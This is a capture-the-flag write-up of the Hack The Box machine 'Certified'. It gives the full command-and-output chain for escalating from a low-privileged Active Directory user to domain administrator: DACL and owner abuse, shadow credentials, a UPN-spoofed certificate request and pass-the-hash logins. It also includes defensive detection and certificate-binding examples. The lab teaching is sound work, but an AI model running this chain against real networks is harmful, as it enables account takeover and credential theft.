Hackthebox: Certified

Foued SAIDI

Overview

Certified is a medium-difficulty machine from Hack The Box. It starts with provided credentials that let us enumerate the DC through BloodHound. We then abuse judith's WriteOwner over the MANAGEMENT group to make her its owner, grant herself WriteMembers and add herself to the group, which in turn lets her write msDS-KeyCredentialLink on the management_svc user, request a certificate on his behalf and get the user flag. Finally we abuse management_svc's GenericAll on ca_operator to change his UPN to the administrator's and request a certificate on his behalf, which gets us the administrator's NTLM hash.

Certified-info-card

Reconnaissance

┌──(kali㉿kali)-[~]
└─$ nmap -A -Pn 10.129.22.253
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 13:32 EST
Nmap scan report for 10.129.22.253
Host is up (0.12s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-06 01:37:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-11-06T01:38:53+00:00; +7h04m53s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-06T01:38:54+00:00; +7h04m52s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-11-06T01:38:53+00:00; +7h04m53s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-11-06T01:38:54+00:00; +7h04m52s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-11-06T01:38:15
|_ start_date: N/A
|_clock-skew: mean: 7h04m52s, deviation: 0s, median: 7h04m52s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.95 seconds

We can see that the typical AD DC ports are open (DNS, Kerberos, RPC, SMB, LDAP/LDAPS and the global catalog), and the LDAP certificate tells us the DC is DC01.certified.htb.

One more thing: credentials were supplied with the box. Username: judith.mader, Password: judith09

Bloodhound Enumeration

We can use the provided credentials alongside the bloodhound-python tool to gather intel on the machine:

┌──(kali㉿kali)-[~/Hackthebox/Certified]
└─$ bloodhound-python -d certified.htb -c all -u judith.mader -p 'judith09' -ns 10.129.22.253 --zip
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 16S
INFO: Compressing output into 20250314235232_bloodhound.zip

We first mark judith as an owned user. BloodHound then shows that she has WriteOwner on the MANAGEMENT group, which has GenericWrite on the MANAGEMENT_SVC user, who can PSRemote to the DC. So what we'll do now is first make ourselves owner of the MANAGEMENT group, then add ourselves as a member so we can later abuse the GenericWrite edge.

BloodHound Enumeration

Foothold

Adding judith as Owner to MANAGEMENT group

┌──(kali㉿kali)-[~/Hackthebox/Certified]
└─$ impacket-owneredit -action write -new-owner 'judith.mader' -target 'management' 'certified/judith.mader':'judith09' -dc-ip 10.129.22.253
<snip>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!

┌──(kali㉿kali)-[~/Hackthebox/Certified]
└─$

Granting judith WriteMembers permissions

┌──(kali㉿kali)-[~/Hackthebox/Certified]
└─$ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
<snip>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250315-000215.bak
[*] DACL modified successfully!

Adding judith as member of MANAGEMENT

┌──(kali㉿kali)-[~/Hackthebox/Certified]
└─$ net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "DC01.certified.htb"

Note: this command prints nothing on success.

We will use the pywhisker tool from GitHub to add a key credential to management_svc's msDS-KeyCredentialLink attribute (a shadow credential), then authenticate with the resulting certificate to recover his NTLM hash:

┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ python3 pywhisker.py --dc-ip 10.129.22.253 -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: b408c279-49d2-1cf9-a680-792376ef3f43
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: O5DKZp1j.pfx
[*] Must be used with password: E1oblaZPhYWbHhc8Z169
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ certipy-ad cert -export -pfx "/home/kali/Hackthebox/Certified/pywhisker/O5DKZp1j.pfx" -password "E1oblaZPhYWbHhc8Z169" -out "unprotected.pfx"
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'unprotected.pfx'

┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ certipy-ad auth -pfx unprotected.pfx -dc-ip '10.129.22.253' -username 'management_svc' -domain 'certified.htb'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584

And we got it!

Now we can grab our user flag:

┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ evil-winrm -i 10.129.22.253 -u management_svc -H 'a091c1832bcdd4677c28b5a6a1295584'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> type ../desktop/user.txt
15df55cc8b45dd564d9e16cdc7ce4196
*Evil-WinRM* PS C:\Users\management_svc\Documents>

Privilege Escalation

Looking at the privileges management_svc has, we can see he has GenericAll on ca_operator. What we can do is change ca_operator's password, update his UPN to the administrator's, request a certificate with certipy and then authenticate as the administrator to get his hash.

Changing ca_operator password

┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ pth-net rpc password "ca_operator" "NewPasswordKujen@2025#" -U "certified.htb"/"management_svc"%"aad3b435b51404eeaad3b435b51404ee":"a091c1832bcdd4677c28b5a6a1295584" -S "DC01.certified.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...

Changing ca_operator's UPN to Administrator

┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ certipy-ad account update -username [email protected] -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
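Every step of this chain so far (owner change and DACL edit on MANAGEMENT, the group membership add, the msDS-KeyCredentialLink write on management_svc, and the userPrincipalName change on ca_operator) is a directory write the DC can audit. The following is an added example, not code from this writeup or from any of the tools used above: it runs simple detection rules over constructed sample events shaped like parsed Windows Security events 5136 and 4728. The domain SID comes from the impacket-owneredit output above; the RID 1103 for judith, the watchlists and the helpdesk event are constructed placeholders.

```python
"""Detection rules for the directory changes made in this chain, run over
constructed sample events (not logs from the box). The dicts mirror the
fields a SIEM extracts from Windows Security events:
  5136  A directory service object was modified (requires "Audit Directory
        Service Changes" plus a SACL on the objects; OperationType
        %%14674 = value added, %%14675 = value deleted)
  4728  A member was added to a security-enabled global group
"""
import re

# Assumed watchlists; tailor per domain.
PRIVILEGED_NAMES = {"administrator"}
WATCHED_GROUPS = {"management", "domain admins"}
# Schema GUID of the 'member' attribute; an OA ACE carrying it with WP grants WriteMembers.
MEMBER_ATTR_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"
# Domain SID taken from the owneredit output; RID 1103 for judith is a constructed placeholder.
DOMAIN_SID = "S-1-5-21-729746778-2675978091-3820388244"
JUDITH_SID = DOMAIN_SID + "-1103"
GROUP_DN = "CN=Management,CN=Users,DC=certified,DC=htb"


def cn_of(dn: str) -> str:
    """First RDN of a DN, lower-cased: 'CN=MANAGEMENT,CN=Users,...' -> 'management'."""
    m = re.match(r"CN=([^,]+)", dn, re.I)
    return (m.group(1) if m else dn).lower()


def sddl_owner(sddl: str):
    """Owner token of an SDDL string: the 'O:' part up to the next G:/D:/S: section."""
    m = re.match(r"O:(.+?)(?=G:|D:|S:|$)", sddl)
    return m.group(1) if m else None


def analyze(events):
    """Return a list of alert dicts, one per suspicious event, in input order."""
    alerts = []
    for ev in events:
        subj = ev.get("SubjectUserName", "?")
        if ev["EventID"] == 5136:
            if ev["OperationType"] != "%%14674":
                continue  # the paired %%14675 event only carries the old value
            attr = ev["AttributeLDAPDisplayName"]
            target = cn_of(ev["ObjectDN"])
            if attr == "nTSecurityDescriptor" and ev["ObjectClass"] == "group" and target in WATCHED_GROUPS:
                sddl = ev["AttributeValue"]
                alerts.append({"rule": "group-acl-change", "group": target, "by": subj,
                               "new_owner": sddl_owner(sddl),
                               "grants_member_write": MEMBER_ATTR_GUID in sddl.lower()})
            elif attr == "msDS-KeyCredentialLink":
                # 5136 reports the target's DN, not its sAMAccountName; correlate the two in the SIEM
                alerts.append({"rule": "shadow-credential", "target": target, "by": subj})
            elif attr == "userPrincipalName":
                claimed = ev["AttributeValue"].split("@")[0].lower()
                if claimed in PRIVILEGED_NAMES and claimed != target:
                    alerts.append({"rule": "upn-spoof", "target": target, "claimed": claimed, "by": subj})
        elif ev["EventID"] in (4728, 4732, 4756):  # global / local / universal group member added
            group = ev["TargetUserName"].lower()
            if group in WATCHED_GROUPS:
                alerts.append({"rule": "group-member-added", "group": group,
                               "member": cn_of(ev["MemberName"]), "by": subj})
    return alerts


# Constructed sample events replaying the chain (values shortened, not captured logs).
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "judith.mader", "ObjectDN": GROUP_DN, "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14675",
     "AttributeValue": f"O:{DOMAIN_SID}-512G:DAD:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"},
    {"EventID": 5136, "SubjectUserName": "judith.mader", "ObjectDN": GROUP_DN, "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674",
     "AttributeValue": f"O:{JUDITH_SID}G:DAD:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"},
    {"EventID": 5136, "SubjectUserName": "judith.mader", "ObjectDN": GROUP_DN, "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674",
     "AttributeValue": f"O:{JUDITH_SID}G:DAD:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
                       f"(OA;;WP;{MEMBER_ATTR_GUID};;{JUDITH_SID})"},
    {"EventID": 4728, "SubjectUserName": "judith.mader", "TargetUserName": "Management",
     "MemberName": "CN=Judith Mader,CN=Users,DC=certified,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "judith.mader", "ObjectClass": "user",
     "ObjectDN": "CN=management service,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674",
     "AttributeValue": "B:8:00020000:CN=management service,CN=Users,DC=certified,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "management_svc", "ObjectClass": "user",
     "ObjectDN": "CN=ca_operator,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": "%%14674",
     "AttributeValue": "Administrator"},
    {"EventID": 5136, "SubjectUserName": "helpdesk", "ObjectClass": "user",  # benign change, no alert
     "ObjectDN": "CN=ca_operator,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674",
     "AttributeValue": "CA operator account"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

Run over the sample, the rules raise five alerts: two ACL changes on MANAGEMENT (the second one carrying a WriteMembers ACE for the new owner), one membership add, one shadow-credential write and one UPN that claims a privileged name on the wrong object; the description change stays silent. In a real environment the 5136 events only exist if directory service change auditing is enabled and the group and user objects carry a SACL covering write operations.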

Requesting a certificate through AD CS

┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ certipy-ad req -username [email protected] -p NewPasswordKujen@2025# -ca certified-DC01-CA -template CertifiedAuthentication -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\('
"(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[+] Trying to resolve 'CERTIFIED.HTB' at '192.168.235.2'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.129.22.253
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.22.253[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.22.253[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Now we can authenticate as the administrator with this certificate and retrieve his hash:

┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ certipy-ad auth -pfx administrator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
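The two certipy lines that explain this result are "Got certificate with UPN 'Administrator'" and "Certificate has no object SID": the certificate carries the spoofed UPN but no CA-asserted SID, so the KDC falls back to mapping it by UPN. The following is an added, simplified model, written for this page and not Microsoft's or Certipy's code, of how a KDC binds a certificate to an account in the Compatibility (1) and Full Enforcement (2) modes of the StrongCertificateBindingEnforcement registry value documented in KB5014754; the account SIDs' RIDs 500 and 1106, the serial numbers and the dates are constructed placeholders, only the domain SID and the CA name come from the page.

```python
"""Simplified model of KDC certificate-to-account binding under the
StrongCertificateBindingEnforcement modes (KB5014754). Not Microsoft's
code: it captures the documented rules closely enough to show why a
certificate with UPN 'Administrator' and no SID extension was accepted,
and what would have rejected it.
"""
from dataclasses import dataclass, field
from datetime import datetime
from typing import List, Optional, Tuple

COMPATIBILITY, FULL_ENFORCEMENT = 1, 2          # registry values modelled here
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000       # msPKI-Enrollment-Flag bit: CA omits the SID extension
STRONG_MAPPINGS = {"X509IssuerSerialNumber", "X509SKI", "X509SHA1PublicKey"}  # strong altSecurityIdentities types
DOMAIN_SID = "S-1-5-21-729746778-2675978091-3820388244"   # from the owneredit output on this page


@dataclass
class Cert:
    upn: Optional[str]          # UPN from the SAN othername, e.g. 'Administrator'
    object_sid: Optional[str]   # value of the SID extension 1.3.6.1.4.1.311.25.2, if present
    not_before: datetime
    issuer_serial: str          # 'issuer|serial', compared against explicit mappings


@dataclass
class Account:
    sam: str
    sid: str
    when_created: datetime
    mappings: List[Tuple[str, str]] = field(default_factory=list)  # (type, value) from altSecurityIdentities


def template_omits_sid(enrollment_flag: int) -> bool:
    """True when a template's msPKI-Enrollment-Flag carries CT_FLAG_NO_SECURITY_EXTENSION."""
    return bool(enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION)


def map_certificate(cert: Cert, accounts: List[Account], mode: int):
    """Return (sAMAccountName or None, reason) for the account the KDC would bind the cert to."""
    if mode not in (COMPATIBILITY, FULL_ENFORCEMENT):
        raise ValueError("model covers modes 1 and 2 only")
    by_sid = {a.sid: a for a in accounts}
    by_name = {a.sam.lower(): a for a in accounts}
    upn_user = cert.upn.split("@")[0].lower() if cert.upn else None

    # 1. SID extension: CA-asserted, strong; it overrides whatever the SAN claims.
    if cert.object_sid:
        acct = by_sid.get(cert.object_sid)
        if acct is None:
            return None, "SID extension matches no account (KDC event 41)"
        if upn_user and upn_user != acct.sam.lower():
            return None, "UPN in SAN disagrees with SID extension (KDC event 41)"
        return acct.sam, "strong mapping via SID extension"

    # 2. Explicit strong mapping configured by an admin in altSecurityIdentities.
    for acct in accounts:
        for kind, value in acct.mappings:
            if kind in STRONG_MAPPINGS and value == cert.issuer_serial:
                return acct.sam, f"strong mapping via {kind}"

    # 3. Implicit UPN mapping: the weak path the attack relies on.
    if upn_user is None or upn_user not in by_name:
        return None, "no usable mapping"
    acct = by_name[upn_user]
    if mode == FULL_ENFORCEMENT:
        return None, "weak UPN mapping rejected in full enforcement"
    if cert.not_before < acct.when_created:
        return None, "certificate predates the account (KDC event 40)"
    return acct.sam, "weak UPN mapping allowed, KDC warns with event 39"


# Constructed scenario mirroring the page: RIDs, serials and dates are placeholders.
CREATED = datetime(2024, 5, 13)
ADMIN = Account("Administrator", DOMAIN_SID + "-500", CREATED,
                mappings=[("X509IssuerSerialNumber", "certified-DC01-CA|7f")])
CA_OPERATOR = Account("ca_operator", DOMAIN_SID + "-1106", CREATED)
ACCOUNTS = [ADMIN, CA_OPERATOR]
# The certificate obtained above: UPN 'Administrator', no object SID, requested by ca_operator.
PAGE_CERT = Cert("Administrator", None, datetime(2025, 3, 14), "certified-DC01-CA|4")
# The same request if the template had kept the SID extension: the CA stamps ca_operator's SID.
SID_CERT = Cert("Administrator", CA_OPERATOR.sid, datetime(2025, 3, 14), "certified-DC01-CA|5")

if __name__ == "__main__":
    for name, cert in (("page cert", PAGE_CERT), ("cert with SID", SID_CERT)):
        for mode in (COMPATIBILITY, FULL_ENFORCEMENT):
            print(name, "mode", mode, "->", map_certificate(cert, ACCOUNTS, mode))
```

In Compatibility mode the page's certificate binds to Administrator through the UPN alone (the KDC only warns), which is exactly what certipy's "Using principal: administrator@..." reflects. Either of two changes on the defender's side breaks the path without touching the template's UPN handling: clearing CT_FLAG_NO_SECURITY_EXTENSION on the template, so the issued certificate carries ca_operator's SID and the mismatch with the spoofed UPN is rejected, or moving the KDC to Full Enforcement, where a certificate without a strong binding is refused outright.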

And we can now claim our root flag:

┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker]
└─$ evil-winrm -i 10.129.22.253 -u administrator -H '0d5b49608bbce1751f708748f67e2d34'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
a3bee3c7ebc8c6dc7f0bf15e791c1f84
*Evil-WinRM* PS C:\Users\Administrator\Documents>

That was it for Certified, hope you learned something new!
-0xkujen

  • Title: Hackthebox: Certified
  • Author: Foued SAIDI
  • Created at : 2025-03-14 17:28:50
  • Updated at : 2025-03-14 18:54:39
  • Link: https://kujen5.github.io/2025/03/14/Hackthebox-Certified/
  • License: This work is licensed under CC BY-NC-SA 4.0.